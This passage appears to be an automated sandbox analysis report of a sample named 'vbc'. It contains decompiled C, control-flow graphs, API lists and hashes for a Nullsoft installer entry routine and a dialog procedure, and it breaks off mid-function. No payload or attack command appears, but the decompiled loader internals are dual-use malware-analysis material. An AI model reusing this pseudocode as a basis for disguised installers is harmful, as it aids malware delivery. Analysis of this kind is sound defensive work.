4038ed-4038f5 86->95 87->88 89->67 107 40391c-403932 call 40653d * 2 89->107 105 40396a-403984 lstrcatW lstrcmpiW 90->105 106 40395f-403965 lstrcatW 90->106 103 403ae8-403af3 ExitWindowsEx 92->103 104 403adc-403ae6 92->104 93->92 94->95 99 4038f7 94->99 95->86 95->99 99->81 103->85 108 403af5-403af7 call 40140b 103->108 104->103 104->108 109 403a57 105->109 110 40398a-40398d 105->110 106->105 107->72 108->85 109->67 114 403996 call 405aeb 110->114 115 40398f-403994 call 405a6e 110->115 121 40399b-4039ab SetCurrentDirectoryW 114->121 115->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 133 403a50-403a52 call 4062fd 131->133 132->131 134 403a18-403a38 call 4062fd call 40657a call 405b20 132->134 133->109 134->131 142 403a3a-403a41 CloseHandle 134->142 142->131
                                                C-Code - Quality: 79%
                                                			_entry_() {
                                                				WCHAR* _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				int _v24;
                                                				int _v28;
                                                				struct _TOKEN_PRIVILEGES _v40;
                                                				signed char _v42;
                                                				int _v44;
                                                				signed int _v48;
                                                				intOrPtr _v278;
                                                				signed short _v310;
                                                				struct _OSVERSIONINFOW _v324;
                                                				struct _SHFILEINFOW _v1016;
                                                				intOrPtr* _t88;
                                                				intOrPtr* _t94;
                                                				void _t97;
                                                				void* _t116;
                                                				WCHAR* _t118;
                                                				signed int _t120;
                                                				intOrPtr* _t124;
                                                				void* _t138;
                                                				void* _t144;
                                                				void* _t149;
                                                				void* _t153;
                                                				void* _t158;
                                                				signed int _t168;
                                                				void* _t171;
                                                				void* _t176;
                                                				intOrPtr _t178;
                                                				intOrPtr _t179;
                                                				intOrPtr* _t180;
                                                				int _t189;
                                                				void* _t190;
                                                				void* _t199;
                                                				signed int _t205;
                                                				signed int _t210;
                                                				signed int _t215;
                                                				int* _t219;
                                                				signed int _t227;
                                                				signed int _t230;
                                                				CHAR* _t232;
                                                				signed int _t234;
                                                				WCHAR* _t235;
                                                
                                                				0x440000 = 0x20;
                                                				_t189 = 0;
                                                				_v24 = 0;
                                                				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                				_v20 = 0;
                                                				SetErrorMode(0x8001); // executed
                                                				_v324.szCSDVersion = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				_v324.dwOSVersionInfoSize = 0x11c;
                                                				if(GetVersionExW( &_v324) == 0) {
                                                					_v324.dwOSVersionInfoSize = 0x114;
                                                					GetVersionExW( &_v324);
                                                					asm("sbb eax, eax");
                                                					_v42 = 4;
                                                					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                				}
                                                				if(_v324.dwMajorVersion < 0xa) {
                                                					_v310 = _v310 & 0x00000000;
                                                				}
                                                				 *0x434fb8 = _v324.dwBuildNumber;
                                                				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                				if( *0x434fbe != 0x600) {
                                                					_t180 = E0040690A(_t189);
                                                					if(_t180 != _t189) {
                                                						 *_t180(0xc00);
                                                					}
                                                				}
                                                				_t232 = "UXTHEME";
                                                				do {
                                                					E0040689A(_t232); // executed
                                                					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                				} while ( *_t232 != 0);
                                                				E0040690A(0xb);
                                                				 *0x434f04 = E0040690A(9);
                                                				_t88 = E0040690A(7);
                                                				if(_t88 != _t189) {
                                                					_t88 =  *_t88(0x1e);
                                                					if(_t88 != 0) {
                                                						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                					}
                                                				}
                                                				__imp__#17();
                                                				__imp__OleInitialize(_t189); // executed
                                                				 *0x434fc0 = _t88;
                                                				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                				E0040653D(0x433f00, L"NSIS Error");
                                                				E0040653D(0x440000, GetCommandLineW());
                                                				_t94 = 0x440000;
                                                				_t234 = 0x22;
                                                				 *0x434f00 = 0x400000;
                                                				if( *0x440000 == _t234) {
                                                					_t94 = 0x440002;
                                                				}
                                                				_t199 = CharNextW(E00405E39(_t94, 0x440000));
                                                				_v16 = _t199;
                                                				while(1) {
                                                					_t97 =  *_t199;
                                                					_t252 = _t97 - _t189;
                                                					if(_t97 == _t189) {
                                                						break;
                                                					}
                                                					_t210 = 0x20;
                                                					__eflags = _t97 - _t210;
                                                					if(_t97 != _t210) {
                                                						L17:
                                                						__eflags =  *_t199 - _t234;
                                                						_v12 = _t210;
                                                						if( *_t199 == _t234) {
                                                							_v12 = _t234;
                                                							_t199 = _t199 + 2;
                                                							__eflags = _t199;
                                                						}
                                                						__eflags =  *_t199 - 0x2f;
                                                						if( *_t199 != 0x2f) {
                                                							L32:
                                                							_t199 = E00405E39(_t199, _v12);
                                                							__eflags =  *_t199 - _t234;
                                                							if(__eflags == 0) {
                                                								_t199 = _t199 + 2;
                                                								__eflags = _t199;
                                                							}
                                                							continue;
                                                						} else {
                                                							_t199 = _t199 + 2;
                                                							__eflags =  *_t199 - 0x53;
                                                							if( *_t199 != 0x53) {
                                                								L24:
                                                								asm("cdq");
                                                								asm("cdq");
                                                								_t215 = L"NCRC" & 0x0000ffff;
                                                								asm("cdq");
                                                								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                									L29:
                                                									asm("cdq");
                                                									asm("cdq");
                                                									_t210 = L" /D=" & 0x0000ffff;
                                                									asm("cdq");
                                                									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                										L31:
                                                										_t234 = 0x22;
                                                										goto L32;
                                                									}
                                                									__eflags =  *_t199 - _t230;
                                                									if( *_t199 == _t230) {
                                                										 *(_t199 - 4) = _t189;
                                                										__eflags = _t199;
                                                										E0040653D(0x440800, _t199);
                                                										L37:
                                                										_t235 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                										GetTempPathW(0x400, _t235);
                                                										_t116 = E004034FC(_t199, _t252);
                                                										_t253 = _t116;
                                                										if(_t116 != 0) {
                                                											L40:
                                                											DeleteFileW(L"1033"); // executed
                                                											_t118 = E0040307D(_t255, _v20); // executed
                                                											_v8 = _t118;
                                                											if(_t118 != _t189) {
                                                												L68:
                                                												E00403B12();
                                                												__imp__OleUninitialize();
                                                												if(_v8 == _t189) {
                                                													if( *0x434f94 == _t189) {
                                                														L77:
                                                														_t120 =  *0x434fac;
                                                														if(_t120 != 0xffffffff) {
                                                															_v24 = _t120;
                                                														}
                                                														ExitProcess(_v24);
                                                													}
                                                													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                														_v40.PrivilegeCount = 1;
                                                														_v28 = 2;
                                                														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                													}
                                                													_t124 = E0040690A(4);
                                                													if(_t124 == _t189) {
                                                														L75:
                                                														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                															goto L77;
                                                														}
                                                														goto L76;
                                                													} else {
                                                														_push(0x80040002);
                                                														_push(0x25);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														if( *_t124() == 0) {
                                                															L76:
                                                															E0040140B(9);
                                                															goto L77;
                                                														}
                                                														goto L75;
                                                													}
                                                												}
                                                												E00405B9D(_v8, 0x200010);
                                                												ExitProcess(2);
                                                											}
                                                											if( *0x434f1c == _t189) {
                                                												L51:
                                                												 *0x434fac =  *0x434fac | 0xffffffff;
                                                												_v24 = E00403BEC(_t265);
                                                												goto L68;
                                                											}
                                                											_t219 = E00405E39(0x440000, _t189);
                                                											if(_t219 < 0x440000) {
                                                												L48:
                                                												_t264 = _t219 - 0x440000;
                                                												_v8 = L"Error launching installer";
                                                												if(_t219 < 0x440000) {
                                                													_t190 = E00405B08(__eflags);
                                                													lstrcatW(_t235, L"~nsu");
                                                													__eflags = _t190;
                                                													if(_t190 != 0) {
                                                														lstrcatW(_t235, "A");
                                                													}
                                                													lstrcatW(_t235, L".tmp");
                                                													_t138 = lstrcmpiW(_t235, 0x441800);
                                                													__eflags = _t138;
                                                													if(_t138 == 0) {
                                                														L67:
                                                														_t189 = 0;
                                                														__eflags = 0;
                                                														goto L68;
                                                													} else {
                                                														__eflags = _t190;
                                                														_push(_t235);
                                                														if(_t190 == 0) {
                                                															E00405AEB();
                                                														} else {
                                                															E00405A6E();
                                                														}
                                                														SetCurrentDirectoryW(_t235);
                                                														__eflags =  *0x440800;
                                                														if( *0x440800 == 0) {
                                                															E0040653D(0x440800, 0x441800);
                                                														}
                                                														E0040653D(0x436000, _v16);
                                                														_t202 = "A" & 0x0000ffff;
                                                														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                														__eflags = _t144;
                                                														_v12 = 0x1a;
                                                														 *0x436800 = _t144;
                                                														do {
                                                															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                															DeleteFileW(0x42aa28);
                                                															__eflags = _v8;
                                                															if(_v8 != 0) {
                                                																_t149 = CopyFileW(0x443800, 0x42aa28, 1);
                                                																__eflags = _t149;
                                                																if(_t149 != 0) {
                                                																	E004062FD(_t202, 0x42aa28, 0);
                                                																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                																	_t153 = E00405B20(0x42aa28);
                                                																	__eflags = _t153;
                                                																	if(_t153 != 0) {
                                                																		CloseHandle(_t153);
                                                																		_v8 = 0;
                                                																	}
                                                																}
                                                															}
                                                															 *0x436800 =  *0x436800 + 1;
                                                															_t61 =  &_v12;
                                                															 *_t61 = _v12 - 1;
                                                															__eflags =  *_t61;
                                                														} while ( *_t61 != 0);
                                                														E004062FD(_t202, _t235, 0);
                                                														goto L67;
                                                													}
                                                												}
                                                												 *_t219 = _t189;
                                                												_t222 =  &(_t219[2]);
                                                												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                												_t265 = _t158;
                                                												if(_t158 == 0) {
                                                													goto L68;
                                                												}
                                                												E0040653D(0x440800, _t222);
                                                												E0040653D(0x441000, _t222);
                                                												_v8 = _t189;
                                                												goto L51;
                                                											}
                                                											asm("cdq");
                                                											asm("cdq");
                                                											asm("cdq");
                                                											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                												_t219 = _t219;
                                                												if(_t219 >= 0x440000) {
                                                													continue;
                                                												}
                                                												break;
                                                											}
                                                											_t189 = 0;
                                                											goto L48;
                                                										}
                                                										GetWindowsDirectoryW(_t235, 0x3fb);
                                                										lstrcatW(_t235, L"\\Temp");
                                                										_t171 = E004034FC(_t199, _t253);
                                                										_t254 = _t171;
                                                										if(_t171 != 0) {
                                                											goto L40;
                                                										}
                                                										GetTempPathW(0x3fc, _t235);
                                                										lstrcatW(_t235, L"Low");
                                                										SetEnvironmentVariableW(L"TEMP", _t235);
                                                										SetEnvironmentVariableW(L"TMP", _t235);
                                                										_t176 = E004034FC(_t199, _t254);
                                                										_t255 = _t176;
                                                										if(_t176 == 0) {
                                                											goto L68;
                                                										}
                                                										goto L40;
                                                									}
                                                									goto L31;
                                                								}
                                                								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                									goto L29;
                                                								}
                                                								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                								__eflags = _t178 - 0x20;
                                                								if(_t178 == 0x20) {
                                                									L28:
                                                									_t36 =  &_v20;
                                                									 *_t36 = _v20 | 0x00000004;
                                                									__eflags =  *_t36;
                                                									goto L29;
                                                								}
                                                								__eflags = _t178 - _t189;
                                                								if(_t178 != _t189) {
                                                									goto L29;
                                                								}
                                                								goto L28;
                                                							}
                                                							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                							__eflags = _t179 - _t210;
                                                							if(_t179 == _t210) {
                                                								L23:
                                                								 *0x434fa0 = 1;
                                                								goto L24;
                                                							}
                                                							__eflags = _t179 - _t189;
                                                							if(_t179 != _t189) {
                                                								goto L24;
                                                							}
                                                							goto L23;
                                                						}
                                                					} else {
                                                						goto L16;
                                                					}
                                                					do {
                                                						L16:
                                                						_t199 = _t199 + 2;
                                                						__eflags =  *_t199 - _t210;
                                                					} while ( *_t199 == _t210);
                                                					goto L17;
                                                				}
                                                				goto L37;
                                                			}















































                                                0x0040353b
                                                0x0040353c
                                                0x00403543
                                                0x00403546
                                                0x0040354d
                                                0x00403550
                                                0x00403563
                                                0x00403569
                                                0x0040356c
                                                0x0040356f
                                                0x0040357d
                                                0x00403585
                                                0x00403590
                                                0x004035a9
                                                0x004035ab
                                                0x004035b3
                                                0x004035b3
                                                0x004035be
                                                0x004035c0
                                                0x004035c0
                                                0x004035d5
                                                0x004035fa
                                                0x00403608
                                                0x0040360b
                                                0x00403612
                                                0x00403619
                                                0x00403619
                                                0x00403612
                                                0x0040361b
                                                0x00403620
                                                0x00403621
                                                0x0040362d
                                                0x00403631
                                                0x00403638
                                                0x00403646
                                                0x0040364b
                                                0x00403652
                                                0x00403656
                                                0x0040365a
                                                0x0040365c
                                                0x0040365c
                                                0x0040365a
                                                0x00403663
                                                0x0040366a
                                                0x00403670
                                                0x00403688
                                                0x00403698
                                                0x004036aa
                                                0x004036b1
                                                0x004036b3
                                                0x004036b4
                                                0x004036c5
                                                0x004036c9
                                                0x004036c9
                                                0x004036dc
                                                0x004036de
                                                0x004037d8
                                                0x004037d8
                                                0x004037db
                                                0x004037de
                                                0x00000000
                                                0x00000000
                                                0x004036e8
                                                0x004036e9
                                                0x004036ec
                                                0x004036f5
                                                0x004036f5
                                                0x004036f8
                                                0x004036fb
                                                0x004036fe
                                                0x00403701
                                                0x00403701
                                                0x00403701
                                                0x00403702
                                                0x00403706
                                                0x004037c6
                                                0x004037cf
                                                0x004037d1
                                                0x004037d4
                                                0x004037d7
                                                0x004037d7
                                                0x004037d7
                                                0x00000000
                                                0x0040370c
                                                0x0040370d
                                                0x0040370e
                                                0x00403712
                                                0x0040372c
                                                0x00403733
                                                0x00403746
                                                0x00403747
                                                0x0040375c
                                                0x00403761
                                                0x00403763
                                                0x00403765
                                                0x00403781
                                                0x00403788
                                                0x0040379b
                                                0x0040379c
                                                0x004037b1
                                                0x004037b7
                                                0x004037b9
                                                0x004037bb
                                                0x004037c3
                                                0x004037c5
                                                0x00000000
                                                0x004037c5
                                                0x004037bf
                                                0x004037c1
                                                0x004037e6
                                                0x004037ea
                                                0x004037f3
                                                0x004037f8
                                                0x004037fe
                                                0x00403809
                                                0x0040380b
                                                0x00403810
                                                0x00403812
                                                0x0040386a
                                                0x0040386f
                                                0x00403878
                                                0x0040387f
                                                0x00403882
                                                0x00403a59
                                                0x00403a59
                                                0x00403a5e
                                                0x00403a67
                                                0x00403a84
                                                0x00403afc
                                                0x00403afc
                                                0x00403b04
                                                0x00403b06
                                                0x00403b06
                                                0x00403b0c
                                                0x00403b0c
                                                0x00403a9b
                                                0x00403aa7
                                                0x00403ab8
                                                0x00403abf
                                                0x00403ac6
                                                0x00403ac6
                                                0x00403ace
                                                0x00403ada
                                                0x00403ae8
                                                0x00403af3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403adc
                                                0x00403adc
                                                0x00403add
                                                0x00403adf
                                                0x00403ae0
                                                0x00403ae1
                                                0x00403ae6
                                                0x00403af5
                                                0x00403af7
                                                0x00000000
                                                0x00403af7
                                                0x00000000
                                                0x00403ae6
                                                0x00403ada
                                                0x00403a71
                                                0x00403a78
                                                0x00403a78
                                                0x0040388e
                                                0x00403935
                                                0x00403935
                                                0x00403941
                                                0x00000000
                                                0x00403941
                                                0x0040389f
                                                0x004038a7
                                                0x004038f9
                                                0x004038f9
                                                0x004038ff
                                                0x00403906
                                                0x00403954
                                                0x00403956
                                                0x0040395b
                                                0x0040395d
                                                0x00403965
                                                0x00403965
                                                0x00403970
                                                0x0040397c
                                                0x00403982
                                                0x00403984
                                                0x00403a57
                                                0x00403a57
                                                0x00403a57
                                                0x00000000
                                                0x0040398a
                                                0x0040398a
                                                0x0040398c
                                                0x0040398d
                                                0x00403996
                                                0x0040398f
                                                0x0040398f
                                                0x0040398f
                                                0x0040399c
                                                0x004039a4
                                                0x004039ab
                                                0x004039b3
                                                0x004039b3
                                                0x004039c0
                                                0x004039cc
                                                0x004039d6
                                                0x004039d6
                                                0x004039d8
                                                0x004039df
                                                0x004039e9
                                                0x004039f5
                                                0x004039fb
                                                0x00403a01
                                                0x00403a04
                                                0x00403a0e
                                                0x00403a14
                                                0x00403a16
                                                0x00403a1a
                                                0x00403a2b
                                                0x00403a31
                                                0x00403a36
                                                0x00403a38
                                                0x00403a3b
                                                0x00403a41
                                                0x00403a41
                                                0x00403a38
                                                0x00403a16
                                                0x00403a44
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a52
                                                0x00000000
                                                0x00403a52
                                                0x00403984
                                                0x00403908
                                                0x0040390b
                                                0x0040390f
                                                0x00403914
                                                0x00403916
                                                0x00000000
                                                0x00000000
                                                0x00403922
                                                0x0040392d
                                                0x00403932
                                                0x00000000
                                                0x00403932
                                                0x004038b0
                                                0x004038c8
                                                0x004038d9
                                                0x004038da
                                                0x004038de
                                                0x004038e0
                                                0x004038ee
                                                0x004038f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004038f5
                                                0x004038f7
                                                0x00000000
                                                0x004038f7
                                                0x0040381a
                                                0x00403826
                                                0x0040382b
                                                0x00403830
                                                0x00403832
                                                0x00000000
                                                0x00000000
                                                0x0040383a
                                                0x00403842
                                                0x00403853
                                                0x0040385b
                                                0x0040385d
                                                0x00403862
                                                0x00403864
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403864
                                                0x00000000
                                                0x004037c1
                                                0x0040376a
                                                0x0040376c
                                                0x00000000
                                                0x00000000
                                                0x0040376e
                                                0x00403772
                                                0x00403776
                                                0x0040377d
                                                0x0040377d
                                                0x0040377d
                                                0x0040377d
                                                0x00000000
                                                0x0040377d
                                                0x00403778
                                                0x0040377b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040377b
                                                0x00403714
                                                0x00403718
                                                0x0040371b
                                                0x00403722
                                                0x00403722
                                                0x00000000
                                                0x00403722
                                                0x0040371d
                                                0x00403720
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403720
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036ee
                                                0x004036ee
                                                0x004036ef
                                                0x004036f0
                                                0x004036f0
                                                0x00000000
                                                0x004036ee
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                • GetVersionExW.KERNEL32(?), ref: 00403579
                                                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                • OleInitialize.OLE32(00000000), ref: 0040366A
                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                • CharNextW.USER32(00000000), ref: 004036D6
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403809
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                • lstrcatW.KERNEL32 ref: 00403826
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040383A
                                                • lstrcatW.KERNEL32 ref: 00403842
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                • lstrcatW.KERNEL32 ref: 00403956
                                                • lstrcatW.KERNEL32 ref: 00403965
                                                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                • lstrcatW.KERNEL32 ref: 00403970
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                                                • CloseHandle.KERNEL32(00000000), ref: 00403A3B
                                                • OleUninitialize.OLE32 ref: 00403A5E
                                                • ExitProcess.KERNEL32 ref: 00403A78
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                • ExitProcess.KERNEL32 ref: 00403B0C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 3859024572-2607992671
                                                • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 168 4057e4-4057e7 145->168 169 4057c8-4057e2 SendMessageW * 2 145->169 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 154 4058f0-4058f6 150->154 155 405944-405948 150->155 152 4058d0-4058df ShowWindow * 2 call 4044ce 151->152 153 405909-405912 call 404500 151->153 152->150 165 405917-40591b 153->165 158 4058f8-405904 call 404472 154->158 159 40591e-40592e ShowWindow 154->159 155->153 162 40594a-405950 155->162 158->153 166 405930-405939 call 40559f 159->166 167 40593e-40593f call 404472 159->167 162->153 163 405952-405965 SendMessageW 162->163 170 405a67-405a69 163->170 171 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 163->171 166->167 167->155 172 4057f7-40580e call 404499 168->172 173 4057e9-4057f5 SendMessageW 168->173 169->168 170->165 180 405998-4059a8 GetWindowRect 171->180 181 4059ab-4059c0 TrackPopupMenu 171->181 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 180->181 181->170 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->170 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->170 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->170
                                                C-Code - Quality: 95%
                                                			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                				struct HWND__* _v8;
                                                				long _v12;
                                                				struct tagRECT _v28;
                                                				void* _v36;
                                                				signed int _v40;
                                                				int _v44;
                                                				int _v48;
                                                				signed int _v52;
                                                				int _v56;
                                                				void* _v60;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t94;
                                                				long _t95;
                                                				int _t100;
                                                				void* _t108;
                                                				intOrPtr _t119;
                                                				void* _t127;
                                                				intOrPtr _t130;
                                                				struct HWND__* _t134;
                                                				int _t156;
                                                				int _t159;
                                                				struct HMENU__* _t164;
                                                				struct HWND__* _t168;
                                                				struct HWND__* _t169;
                                                				int _t171;
                                                				void* _t172;
                                                				short* _t173;
                                                				short* _t175;
                                                				int _t177;
                                                
                                                				_t169 =  *0x433ee4;
                                                				_t156 = 0;
                                                				_v8 = _t169;
                                                				if(_a8 != 0x110) {
                                                					if(_a8 == 0x405) {
                                                						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                						CloseHandle(_t127); // executed
                                                					}
                                                					if(_a8 != 0x111) {
                                                						L17:
                                                						_t171 = 1;
                                                						if(_a8 != 0x404) {
                                                							L25:
                                                							if(_a8 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							_t94 = _v8;
                                                							if(_a12 != _t94) {
                                                								goto L20;
                                                							}
                                                							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                							_a8 = _t95;
                                                							if(_t95 <= _t156) {
                                                								L36:
                                                								return 0;
                                                							}
                                                							_t164 = CreatePopupMenu();
                                                							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                							_t100 = _a16;
                                                							_t159 = _a16 >> 0x10;
                                                							if(_a16 == 0xffffffff) {
                                                								GetWindowRect(_v8,  &_v28);
                                                								_t100 = _v28.left;
                                                								_t159 = _v28.top;
                                                							}
                                                							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                								_v60 = _t156;
                                                								_v48 = 0x42d268;
                                                								_v44 = 0x1000;
                                                								_a4 = _a8;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                								} while (_a4 != _t156);
                                                								OpenClipboard(_t156);
                                                								EmptyClipboard();
                                                								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                								_a4 = _t108;
                                                								_t172 = GlobalLock(_t108);
                                                								do {
                                                									_v48 = _t172;
                                                									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                									 *_t173 = 0xd;
                                                									_t175 = _t173 + 2;
                                                									 *_t175 = 0xa;
                                                									_t172 = _t175 + 2;
                                                									_t156 = _t156 + 1;
